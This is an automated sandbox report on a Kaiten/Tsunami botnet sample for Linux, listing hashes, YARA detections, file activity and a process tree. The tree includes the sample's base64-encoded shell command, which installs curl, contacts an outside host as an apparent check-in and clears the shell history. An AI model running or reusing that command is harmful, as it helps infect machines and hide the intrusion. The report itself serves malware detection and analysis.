kaiten | 0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6

Analysis

max time kernel
82s
max time network
68s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20231215-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
28-12-2023 18:57

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f09c0d5883a221d2e5f762480e946a78
Size

42KB
MD5

f09c0d5883a221d2e5f762480e946a78
SHA1

506386147d393cef81019dda55ac85125914c6be
SHA256

0eb2c98d14fce41db0ac9352484438fc40489d6f40c915b659ecc84342aa83a6
SHA512

a7c13cbb7855172fcb6fea29da30ff256664fc9515fc25019579d9db1344014804316e43e919e95b6110b77d4023a340639b8cdb63b4a6022437316320793c20
SSDEEP

768:oZHhN4I6FWJosiC8bOi6c9rasu7upif9EIgXEB2QeXeoIz8Vj2zc3pTJBXG1wzq:+L4I6zdAi6c94SIgUBVeXO8Azc3pjSw+

Score

10^/10

kaiten botnet

Malware Config

Signatures

Detects Kaiten/Tsunami Payload 1 IoCs

resource	yara_rule
behavioral1/memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp	family_kaiten2

Detects Kaiten/Tsunami payload 1 IoCs

resource	yara_rule
behavioral1/memory/1519-1-0x0000000000400000-0x0000000000416f68-memory.dmp	family_kaiten

Kaiten/Tsunami
Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.
botnet kaiten

Reads runtime system information 59 IoCs

Reads data from /proc virtual filesystem.

description	ioc	Process
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/1/environ	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	id
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/sys/kernel/ngroups_max	apt-get
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/cmdline	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/self/exe	f09c0d5883a221d2e5f762480e946a78
File opened for reading	/proc/filesystems	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	cp
File opened for reading	/proc/self/fd	Process not Found
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/self/stat	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/1/sched	systemctl
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	dpkg
File opened for reading	/proc/filesystems	find
File opened for reading	/proc/filesystems	sed
File opened for reading	/proc/sys/kernel/osrelease	systemctl
File opened for reading	/proc/filesystems	dpkg

Writes file to tmp directory 48 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/apt.conf.5ygGiO	Process not Found
File opened for modification	/tmp/apt.sig.XLvKEk	Process not Found
File opened for modification	/tmp/fileutl.message.xEIziz	apt-get
File opened for modification	/tmp/apt-key-gpghome.o5POtCtfqs/pubring.orig.gpg	cp
File opened for modification	/tmp/fileutl.message.4AWCCT	apt-get
File opened for modification	/tmp/apt.sig.21lb0G	Process not Found
File opened for modification	/tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg	apt-key
File opened for modification	/tmp/apt.data.ZoiP0Q	Process not Found
File opened for modification	/tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg	apt-key
File opened for modification	/tmp/fileutl.message.qLPbJp	apt-get
File opened for modification	/tmp/apt-key-gpghome.lP3aH5RXO8/pubring.orig.gpg	cp
File opened for modification	/tmp/fileutl.message.4Am35S	apt-get
File opened for modification	/tmp/fileutl.message.JRDOIu	apt-get
File opened for modification	/tmp/fileutl.message.5mnKDj	apt-get
File opened for modification	/tmp/fileutl.message.PwJMWw	apt-get
File opened for modification	/tmp/apt.sig.XyhbkB	Process not Found
File opened for modification	/tmp/apt-key-gpghome.Dy6P39OCwo/gpg.1.sh	apt-key
File opened for modification	/tmp/apt.data.lfc2h1	Process not Found
File opened for modification	/tmp/fileutl.message.c0t5Gs	apt-get
File opened for modification	/tmp/fileutl.message.Ry5uh4	apt-get
File opened for modification	/tmp/apt-key-gpghome.o5POtCtfqs/gpg.1.sh	apt-key
File opened for modification	/tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg	touch
File opened for modification	/tmp/fileutl.message.p7Idh2	apt-get
File opened for modification	/tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg	apt-key
File opened for modification	/tmp/fileutl.message.TNKeuh	apt-get
File opened for modification	/tmp/fileutl.message.pMwRl6	apt-get
File opened for modification	/tmp/fileutl.message.MvPvWl	apt-get
File opened for modification	/tmp/fileutl.message.wADoCX	apt-get
File opened for modification	/tmp/apt.data.BIxS8y	Process not Found
File opened for modification	/tmp/apt-key-gpghome.Dy6P39OCwo/pubring.orig.gpg	cp
File opened for modification	/tmp/apt-key-gpghome.PUWKEmdlgl/pubring.orig.gpg	cp
File opened for modification	/tmp/apt-key-gpghome.PUWKEmdlgl/gpg.1.sh	apt-key
File opened for modification	/tmp/fileutl.message.1fsRhH	apt-get
File opened for modification	/tmp/fileutl.message.VT0HSF	apt-get
File opened for modification	/tmp/fileutl.message.PZb8hV	apt-get
File opened for modification	/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg	apt-key
File opened for modification	/tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg	touch
File opened for modification	/tmp/apt-key-gpghome.lP3aH5RXO8/gpg.1.sh	apt-key
File opened for modification	/tmp/apt.conf.g1uyWL	Process not Found
File opened for modification	/tmp/fileutl.message.QwPGB8	apt-get
File opened for modification	/tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg	touch
File opened for modification	/tmp/apt.conf.TaBuRO	Process not Found
File opened for modification	/tmp/fileutl.message.lwEEZH	apt-get
File opened for modification	/tmp/fileutl.message.WTFVgK	apt-get
File opened for modification	/tmp/apt.conf.g9ukqV	Process not Found
File opened for modification	/tmp/apt.data.73Fbeh	Process not Found
File opened for modification	/tmp/apt.sig.BT4hCo	Process not Found

/tmp/f09c0d5883a221d2e5f762480e946a78
/tmp/f09c0d5883a221d2e5f762480e946a78
1⤵
- Reads runtime system information
PID:1519
- /bin/sh
  sh -c "echo aWYgISB0eXBlIGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4gaWYgdHlwZSBhcHQtZ2V0IDI+L2Rldi9udWxsIDE+L2Rldi9udWxsOyB0aGVuIGFwdC1nZXQgdXBkYXRlIC0tZml4LW1pc3NpbmcgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBhcHQtZ2V0IGluc3RhbGwgLXkgY3VybCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IGFwdC1nZXQgaW5zdGFsbCAteSAtLXJlaW5zdGFsbCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkKaWYgdHlwZSB5dW0gMj4vZGV2L251bGwgMT4vZGV2L251bGw7IHRoZW4geXVtIGNsZWFuIGFsbCAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbCA7IHl1bSBpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyB5dW0gcmVpbnN0YWxsIC15IGN1cmwgMj4vZGV2L251bGwgMT4vZGV2L251bGwgOyBmaQppZiB0eXBlIGFwayAyPi9kZXYvbnVsbCAxPi9kZXYvbnVsbDsgdGhlbiBhcGsgdXBkYXRlIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgYXBrIGFkZCBjdXJsIDI+L2Rldi9udWxsIDE+L2Rldi9udWxsIDsgZmkgOyBmaSA7IGN1cmwgLXNMayBodHRwOi8vY2hpbWFlcmEuY2MvbG9nL2luZi5waHAgLW8gL2Rldi9udWxsIDsgaGlzdG9yeSAtYyA7IGNsZWFyCgo= | base64 -d | bash"
  2⤵
  PID:1520
- - /usr/bin/base64
    base64 -d
    3⤵
    PID:1522
- - /bin/bash
    bash
    3⤵
    PID:1523
  - - /usr/bin/apt-get
      apt-get update --fix-missing
      4⤵
      Reads runtime system information
      Writes file to tmp directory
      PID:1524
    - - /usr/bin/dpkg
        
        /usr/bin/dpkg --print-foreign-architectures
        5⤵
        Reads runtime system information
        
        PID:1525
    - - /usr/lib/apt/methods/http
        
        /usr/lib/apt/methods/http
        5⤵
        
        PID:1526
    - - /usr/lib/apt/methods/http
        
        /usr/lib/apt/methods/http
        5⤵
        
        PID:1535
    - - /usr/lib/apt/methods/http
        
        /usr/lib/apt/methods/http
        5⤵
        
        PID:1537
    - - /usr/lib/apt/methods/gpgv
        
        /usr/lib/apt/methods/gpgv
        5⤵
        
        PID:1538
    - - /usr/lib/apt/methods/gpgv
        
        /usr/lib/apt/methods/gpgv
        5⤵
        
        PID:1539

/bin/sh
sh -c "[ ! -e /run/systemd/system ] || [ \$(id -u) -ne 0 ] || systemctl start --no-block apt-news.service esm-cache.service || true"
1⤵
PID:1528
- /usr/bin/id
  id -u
  2⤵
  - Reads runtime system information
  PID:1529
- /bin/systemctl
  systemctl start --no-block apt-news.service esm-cache.service
  2⤵
  - Reads runtime system information
  PID:1530

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.XyhbkB /tmp/apt.data.73Fbeh
1⤵
- Writes file to tmp directory
PID:1541
- /usr/bin/apt-config
  apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
  2⤵
  PID:1543
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1544
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
  2⤵
  PID:1545
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1546
- /usr/bin/apt-config
  apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
  2⤵
  PID:1547
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1548
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
  2⤵
  PID:1549
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1550
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
  2⤵
  PID:1553
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1554
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
  2⤵
  PID:1555
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1556
- /usr/bin/apt-config
  apt-config shell GPGV Apt::Key::gpgvcommand
  2⤵
  PID:1558
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1559
- /bin/mktemp
  mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
  2⤵
  PID:1561
- /bin/chmod
  chmod 700 /tmp/apt-key-gpghome.o5POtCtfqs
  2⤵
  PID:1562
- /bin/readlink
  readlink -f /tmp/apt-key-gpghome.o5POtCtfqs
  2⤵
  PID:1563
- /bin/rm
  rm -f /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg
  2⤵
  PID:1564
- /usr/bin/touch
  touch /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg
  2⤵
  - Writes file to tmp directory
  PID:1566
- /usr/bin/apt-config
  apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
  2⤵
  PID:1567
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1569
- /bin/readlink
  readlink -f /etc/apt/trusted.gpg.d/
  2⤵
  PID:1570
- /usr/bin/find
  find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
  2⤵
  - Reads runtime system information
  PID:1571
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1578
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1583
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1585
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1587
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1589
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1591
- /bin/cp
  cp -a /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg /tmp/apt-key-gpghome.o5POtCtfqs/pubring.orig.gpg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1592
- /usr/bin/gpgv
  gpgv --homedir /tmp/apt-key-gpghome.o5POtCtfqs --keyring /tmp/apt-key-gpghome.o5POtCtfqs/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.XyhbkB /tmp/apt.data.73Fbeh
  2⤵
  PID:1599
- /usr/bin/gpgconf
  gpgconf --kill all
  2⤵
  PID:1603
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart KILLAGENT
    3⤵
    PID:1604
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
    3⤵
    PID:1605
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
    3⤵
    PID:1606
- /bin/rm
  rm -rf /tmp/apt-key-gpghome.o5POtCtfqs
  2⤵
  PID:1607

/usr/bin/sort
sort
1⤵
PID:1574

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1595

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1598

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.21lb0G /tmp/apt.data.BIxS8y
1⤵
- Writes file to tmp directory
PID:1609
- /usr/bin/apt-config
  apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
  2⤵
  PID:1611
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1612
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
  2⤵
  PID:1613
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1614
- /usr/bin/apt-config
  apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
  2⤵
  PID:1615
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1616
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
  2⤵
  PID:1617
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1618
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
  2⤵
  PID:1619
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1620
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
  2⤵
  PID:1621
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1622
- /usr/bin/apt-config
  apt-config shell GPGV Apt::Key::gpgvcommand
  2⤵
  PID:1624
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1625
- /bin/mktemp
  mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
  2⤵
  PID:1626
- /bin/chmod
  chmod 700 /tmp/apt-key-gpghome.Dy6P39OCwo
  2⤵
  PID:1627
- /bin/readlink
  readlink -f /tmp/apt-key-gpghome.Dy6P39OCwo
  2⤵
  PID:1628
- /bin/rm
  rm -f /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg
  2⤵
  PID:1629
- /usr/bin/touch
  touch /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg
  2⤵
  - Writes file to tmp directory
  PID:1630
- /usr/bin/apt-config
  apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
  2⤵
  PID:1631
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1632
- /bin/readlink
  readlink -f /etc/apt/trusted.gpg.d/
  2⤵
  PID:1633
- /usr/bin/find
  find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
  2⤵
  - Reads runtime system information
  PID:1634
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1639
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1641
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1643
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1645
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1647
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1649
- /bin/cp
  cp -a /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.orig.gpg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1650
- /usr/bin/gpgv
  gpgv --homedir /tmp/apt-key-gpghome.Dy6P39OCwo --keyring /tmp/apt-key-gpghome.Dy6P39OCwo/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.21lb0G /tmp/apt.data.BIxS8y
  2⤵
  PID:1657
- /usr/bin/gpgconf
  gpgconf --kill all
  2⤵
  PID:1658
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart KILLAGENT
    3⤵
    PID:1659
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
    3⤵
    PID:1660
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
    3⤵
    PID:1661
- /bin/rm
  rm -rf /tmp/apt-key-gpghome.Dy6P39OCwo
  2⤵
  PID:1662

/usr/bin/sort
sort
1⤵
PID:1637

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1653

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1656

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.XLvKEk /tmp/apt.data.ZoiP0Q
1⤵
- Writes file to tmp directory
PID:1664
- /usr/bin/apt-config
  apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
  2⤵
  PID:1666
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1667
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
  2⤵
  PID:1668
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1669
- /usr/bin/apt-config
  apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
  2⤵
  PID:1672
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1677
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
  2⤵
  PID:1684
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1690
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
  2⤵
  PID:1701
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1713
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
  2⤵
  PID:1728
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1735
- /usr/bin/apt-config
  apt-config shell GPGV Apt::Key::gpgvcommand
  2⤵
  PID:1743
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1748
- /bin/mktemp
  mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
  2⤵
  PID:1758
- /bin/chmod
  chmod 700 /tmp/apt-key-gpghome.lP3aH5RXO8
  2⤵
  PID:1761
- /bin/readlink
  readlink -f /tmp/apt-key-gpghome.lP3aH5RXO8
  2⤵
  PID:1770
- /bin/rm
  rm -f /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg
  2⤵
  PID:1775
- /usr/bin/touch
  touch /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg
  2⤵
  - Writes file to tmp directory
  PID:1780
- /usr/bin/apt-config
  apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
  2⤵
  PID:1784
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1791
- /bin/readlink
  readlink -f /etc/apt/trusted.gpg.d/
  2⤵
  PID:1800
- /usr/bin/find
  find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
  2⤵
  - Reads runtime system information
  PID:1803
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1814
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1817
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1821
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1824
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1826
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2018-archive.gpg
  2⤵
  PID:1829
- /bin/cp
  cp -a /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.orig.gpg
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:1834
- /usr/bin/gpgv
  gpgv --homedir /tmp/apt-key-gpghome.lP3aH5RXO8 --keyring /tmp/apt-key-gpghome.lP3aH5RXO8/pubring.gpg --ignore-time-conflict --status-fd 3 /tmp/apt.sig.XLvKEk /tmp/apt.data.ZoiP0Q
  2⤵
  PID:1868
- /usr/bin/gpgconf
  gpgconf --kill all
  2⤵
  PID:1875
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart KILLAGENT
    3⤵
    PID:1877
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent -s --no-autostart "GETINFO scd_running" "/if \${! \$?}" "scd killscd" /end
    3⤵
    PID:1879
- - /usr/bin/gpg-connect-agent
    gpg-connect-agent --no-autostart --dirmngr KILLDIRMNGR
    3⤵
    PID:1882
- /bin/rm
  rm -rf /tmp/apt-key-gpghome.lP3aH5RXO8
  2⤵
  PID:1886

/usr/bin/sort
sort
1⤵
PID:1809

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1844

/bin/sed
sed -e "s#'#'\"'\"'#g"
1⤵
- Reads runtime system information
PID:1863

/usr/bin/apt-key
/usr/bin/apt-key --quiet --readonly verify --status-fd 3 /tmp/apt.sig.BT4hCo /tmp/apt.data.lfc2h1
1⤵
- Writes file to tmp directory
PID:1925
- /usr/bin/apt-config
  apt-config shell MASTER_KEYRING APT::Key::MasterKeyring
  2⤵
  PID:1929
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1930
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING APT::Key::ArchiveKeyring
  2⤵
  PID:1931
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1932
- /usr/bin/apt-config
  apt-config shell REMOVED_KEYS APT::Key::RemovedKeys
  2⤵
  PID:1933
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1934
- /usr/bin/apt-config
  apt-config shell ARCHIVE_KEYRING_URI APT::Key::ArchiveKeyringURI
  2⤵
  PID:1935
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1936
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Apt::GPGV::TrustedKeyring
  2⤵
  PID:1937
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1938
- /usr/bin/apt-config
  apt-config shell TRUSTEDFILE Dir::Etc::Trusted/f
  2⤵
  PID:1939
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1940
- /usr/bin/apt-config
  apt-config shell GPGV Apt::Key::gpgvcommand
  2⤵
  PID:1942
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1943
- /bin/mktemp
  mktemp --directory --tmpdir apt-key-gpghome.XXXXXXXXXX
  2⤵
  PID:1944
- /bin/chmod
  chmod 700 /tmp/apt-key-gpghome.PUWKEmdlgl
  2⤵
  PID:1945
- /bin/readlink
  readlink -f /tmp/apt-key-gpghome.PUWKEmdlgl
  2⤵
  PID:1946
- /bin/rm
  rm -f /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg
  2⤵
  PID:1947
- /usr/bin/touch
  touch /tmp/apt-key-gpghome.PUWKEmdlgl/pubring.gpg
  2⤵
  - Writes file to tmp directory
  PID:1948
- /usr/bin/apt-config
  apt-config shell TRUSTEDPARTS Dir::Etc::TrustedParts/d
  2⤵
  PID:1949
- - /usr/bin/dpkg
    /usr/bin/dpkg --print-foreign-architectures
    3⤵
    - Reads runtime system information
    PID:1950
- /bin/readlink
  readlink -f /etc/apt/trusted.gpg.d/
  2⤵
  PID:1951
- /usr/bin/find
  find /etc/apt/trusted.gpg.d -mindepth 1 -maxdepth 1 "(" -name "*.gpg" -o -name "*.asc" ")"
  2⤵
  - Reads runtime system information
  PID:1952
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1957
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-archive.gpg
  2⤵
  PID:1959
- /usr/bin/cmp
  cmp --silent "--bytes=1" - /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1961
- /bin/cat
  cat /etc/apt/trusted.gpg.d/ubuntu-keyring-2012-cdimage.gpg
  2⤵
  PID:1963
